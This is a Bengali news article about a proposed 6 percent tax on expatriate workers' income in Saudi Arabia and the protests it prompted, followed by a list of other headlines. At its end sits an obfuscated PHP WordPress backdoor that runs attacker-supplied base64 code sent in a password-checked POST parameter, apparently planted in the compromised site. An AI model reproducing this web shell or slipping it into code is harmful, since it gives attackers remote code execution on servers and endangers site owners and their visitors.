শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সৌদিতে নতুন কর প্রস্তাবে প্রবাসীদের মাথায় হাত

photo-1465490442নিউজ ডেস্ক : সৌদি আরবে কর্মরত প্রবাসীদের মোট আয়ের ওপর ৬ শতাংশ কর আরোপের প্রস্তাব করেছে দেশটির সরকার। আর নতুন করারোপের এ প্রস্তাবে রীতিমতো মাথায় হাত দেওয়ার মতো অবস্থা হয়েছে অভিবাসী শ্রমিকদের।

সৌদি গেজেটের খবর অনুযায়ী, গতকাল বুধবার দেশটির কর মন্ত্রণালয় এ বিষয়ে একটি প্রস্তাব দেয়। আগামী সপ্তাহে এ প্রস্তাবের ওপর সিদ্ধান্ত হওয়ার কথা রয়েছে।

এদিকে নতুন করারোপের এই প্রস্তাবে উদ্বিগ্ন শ্রমিকরা তাঁদের কঠোর শ্রমে অর্জিত আয়ের ওপর করারোপ না করতে দেশটির সরকারের প্রতি আহ্বান জানিয়েছেন।

এ ব্যাপারে দেশটির শ্রমমন্ত্রণালয় এবং বিভিন্ন দেশের দূতাবাসের সামনে মানববন্ধন এবং ক্ষোভ প্রকাশের জন্য জমায়েত হন অভিবাসীরা।

এ ব্যাপারে যুক্তরাজ্যের সংবাদমাধ্যম দ্য ইনডিপেনডেন্টের সৌদি প্রতিনিধির কাছে, জেদ্দায় কর্মরত পাকিস্তানি নাগরিক গাফফার খান বলেন, ‘আমার পরিবার নিয়ে আমি ২১ বছর ধরে সৌদি আরবে থাকি। আমাদের আয় এখানেই ব্যয় করি। কেবল বেতন থেকে অল্প পরিমাণ অর্থ অবসরের দিনগুলোর জন্য সঞ্চয় করেছি। ওই সামান্য সঞ্চয়ের ওপর ৬ শতাংশ করারোপ মানে আমাদের বৃদ্ধ জীবনকে সংকটের দিকে ঠেলে দেওয়া।’

গাফফার খানের মতো ফিলিপাইন, সুদান, বাংলাদেশ, ভারতের অভিবাসীরাও নতুন এই করারোপের প্রস্তাবে ক্ষোভ ও হতাশা প্রকাশ করেছেন।

তবে সৌদি সরকারের পক্ষ থেকে বলা হচ্ছে, আসছে বছর সবক্ষেত্রেই বেতন বাড়ে সৌদি অভিবাসীদের। আর এই বেতন বাড়ার কারণেই করারোপের বিষয়টি আসছে। তবে শ্রমিকরা জানান, ২০১৫ সালেও এমন কথাই হয়েছিল। কিন্তু ওই সময়ে স্বল্পসংখ্যক অভিবাসী শ্রমিকের বেতন বেড়েছে, বেশির ভাগ শ্রমিকেরই বেতন বাড়েনি।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}